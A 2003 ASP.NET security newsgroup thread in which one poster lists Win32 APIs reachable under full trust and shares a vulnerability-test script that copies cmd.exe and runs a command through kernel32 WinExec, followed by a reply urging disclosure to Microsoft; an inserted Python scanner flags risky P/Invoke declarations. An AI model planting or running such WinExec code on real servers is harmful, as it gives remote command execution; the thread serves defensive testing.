Asp.Net.Vulnerability: Win32 API calls (potential security problems)

Discussion in 'ASP .Net Security' started by Dinis Cruz, Oct 16, 2003.

  1. Dinis Cruz

    Dinis Cruz Guest

    Asp.Net.Vulnerability: Win32 API calls (potential security problems)

    Since win32 calls are supported in Asp.Net and cannot be disabled when
    the website is running with 'Full trust', it is imperative to identify
    all potentially dangerous Win32 DLLs. Here is a short list of the ones
    we have identified whose risk needs to be validated and (if required)
    write test scripts for:

    - New: CopyMemory, GetCurrentProcess, GetCurrentThread,
    GetTokenInformation, GetWindowsInformation, isNTAdmin,
    OpenProcessToken, OpenThreadToken, SendMessage
    - Compress: CopyLZFile, LZCopy
    - Crypto: CryptGetUserKey, CryptDestroyKey
    - Drives: GetLogicalDrives, GetVolumeInformation
    - EnvironmentVariables: GetEnvironmentString, GetEnvironmentVariable
    - Error: RaiseException, ReportFault, SetLastError
    - EventLog: OpenEventLog, ClearEventLog, ReportEvent
    - Exit: ExitWindowsEx, FatalAppExit, InitiateSystemShutdown,
    LockWorkstation
    - Files: CopyFile, CreateFile, GetFileAttributes, MoveFile, OpenFile,
    ReadFile, SetFileAttributes, SetFilePointer, SHGetFileInfo,
    TouchFileTimes, WriteFile, FindFile: FindClose, FindFirstFile,
    FindNextFile
    - Heap: GetProcessHeap, HeapAlloc, HeapFree
    - Hook: CallNextHookEx, SetWindowsHookEx
    - ICMP: IcmpCreateFile, IcmpSendEcho
    - INI-Files: GetPrivateProfileSection, GetPrivateProfileString
    - Internet: FtpGetFile, InternetAttemptConnect, InternetConnect,
    InternetOpen, InternetOpenURL, InternetReadFile,
    IsDestinationReachable, IsNetworkAlive, IsValidURL, URLDownloadToFile
    - {List Not completed}

    Since we are not Win32 API experts (although we did manage to write a
    test script for the Kernel32 'WinExec' - see below) we would like to ask
    for help from the more serious Win32 developers, who will be able to
    provide us with much more detailed and accurate information regarding
    the 'security risk' posed by each API call.

    The following is the code that we use in ANSA to test if a server is
    vulnerable.

    '****************************************************************
    ' ANSA:W32_execute_cmd - This test checks if it is possible to execute
    ' commands on the server using a direct Win32 API call to the
    ' kernel32 'WinExec' function. For this test to work a copy of
    ' 'cmd.exe' must be copied to the same directory containing this script
    '****************************************************************

    <script runat=server>

    Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
    Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long

    public Function Run_test(mode)

        try
            Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
            Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
            Dim FailIfExists

            Dim Cmd_to_execute = "dir"

            ' Directory that contains this script
            local_dir = left(request.servervariables("PATH_TRANSLATED"), _
                inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
            local_copy_of_cmd = Local_dir+"cmd.exe"
            Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\_test.exe"

            ' Copy CMD.EXE to temp directory
            CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)

            ' Execute Command and save results in temp file
            errReturn = WinExec(Target_copy_of_cmd + " /c " + cmd_to_execute, 10)

            Run_test = OK + Critical +" The server allows the remote execution of commands using a direct call to WinExec API!"
        catch
            Run_test = OK + low + "It was not possible to execute commands using cmd.exe"
        end try

    end function

    </script>

    '****************************************************************

    Thanks for the help

    Best regards
     
    Dinis Cruz, Oct 16, 2003
    #1
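
A defender-side way to act on the list in post #1, as an added example that is not part of the original post or of ANSA: a Python scanner that finds P/Invoke declarations in ASP.NET source (VB.NET `Declare` and C# `DllImport`) and classifies each by its real entry point rather than by its local name. The watch list is a subset of the post's list plus WinExec, and the function names and `SAMPLE` input are constructed for illustration.

```python
import re
# Subset of the post's list, keyed by its category names; "Exec" is added here
# for WinExec, the API exercised by the post's test script.
RISKY = {
    "EventLog": ["OpenEventLog", "ClearEventLog", "ReportEvent"],
    "Exit": ["ExitWindowsEx", "FatalAppExit", "InitiateSystemShutdown"],
    "Files": ["CopyFile", "CreateFile", "MoveFile", "ReadFile", "WriteFile"],
    "Exec": ["WinExec"],
}
# VB.NET: Declare [Ansi|Unicode|Auto] Function|Sub Name Lib "dll" [Alias "Entry"]
VB_DECLARE = re.compile(
    r'\bDeclare\s+(?:(?:Ansi|Unicode|Auto)\s+)?(?:Function|Sub)\s+(\w+)\s+'
    r'Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?', re.I)
# C#: [DllImport("dll", EntryPoint = "Entry")] <modifiers> extern <type> Name(
CS_IMPORT = re.compile(
    r'\[\s*DllImport\s*\(\s*"([^"]+)"([^)]*)\)\s*\]\s*'
    r'(?:\w+\s+)*?extern\s+[\w.\[\]]+\s+(\w+)\s*\(', re.I)
ENTRY = re.compile(r'EntryPoint\s*=\s*"([^"]+)"', re.I)

def classify(entry):
    """Match an export name, tolerating the ANSI/Unicode 'A'/'W' suffix."""
    e = entry.lower()
    for category, names in RISKY.items():
        for api in names:
            if e in (api.lower(), api.lower() + "a", api.lower() + "w"):
                return api, category
    return entry, "unlisted"

def scan(source):
    """Return (declared_name, dll, api, category) per P/Invoke declaration."""
    found = [(m.group(1), m.group(2), m.group(3) or m.group(1))
             for m in VB_DECLARE.finditer(source)]
    for m in CS_IMPORT.finditer(source):
        ep = ENTRY.search(m.group(2))
        found.append((m.group(3), m.group(1), ep.group(1) if ep else m.group(3)))
    return [(name, dll.lower()) + classify(entry) for name, dll, entry in found]

def flagged(source):
    return [r for r in scan(source) if r[3] != "unlisted"]

# Constructed sample: the local names "Backup" and "Quit" hide the real API.
SAMPLE = '''
Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal c As String, ByVal n As Integer) As Integer
Declare Function Backup Lib "kernel32" Alias "CopyFileA" (ByVal a As String, ByVal b As String, ByVal f As Integer) As Integer
[DllImport("user32.dll", EntryPoint = "ExitWindowsEx")]
static extern bool Quit(uint flags, uint reason);
[DllImport("kernel32.dll")]
static extern uint GetTickCount();
'''
print(flagged(SAMPLE))
```

Resolving the `Alias` or `EntryPoint` value matters because a review that only reads the declared function name would miss `Backup` and `Quit` in the sample.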

  2. Dinis ..why not forward this as it should be to

    The Microsoft Security Response Center (MSRC) draws on the hundreds of
    security professionals at Microsoft to form virtual teams that respond
    to reports of security issues with Microsoft products or technologies.
    To report a suspected vulnerability, please send e-mail to
    .

    Posting a potential vulnerability to a public newsgroup is not showing
    good judgement for disclosure of vulnerabilities assuming these are valid.

    Report responsibility for all of our benefit on the Internet.

    Susan


    --
    "Don't lose sight of security. Security is a state of being,
    not a state of budget. He with the most firewalls still does
    not win. Put down that honeypot and keep up to date on your patches.
    Demand better security from vendors and hold them responsible.
    Use what you have, and make sure you know how to use it properly
    and effectively."
    ~Rain Forest Puppy
    http://www.wiretrip.net/rfp/txt/evolution.txt
     
    Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP], Oct 17, 2003
    #2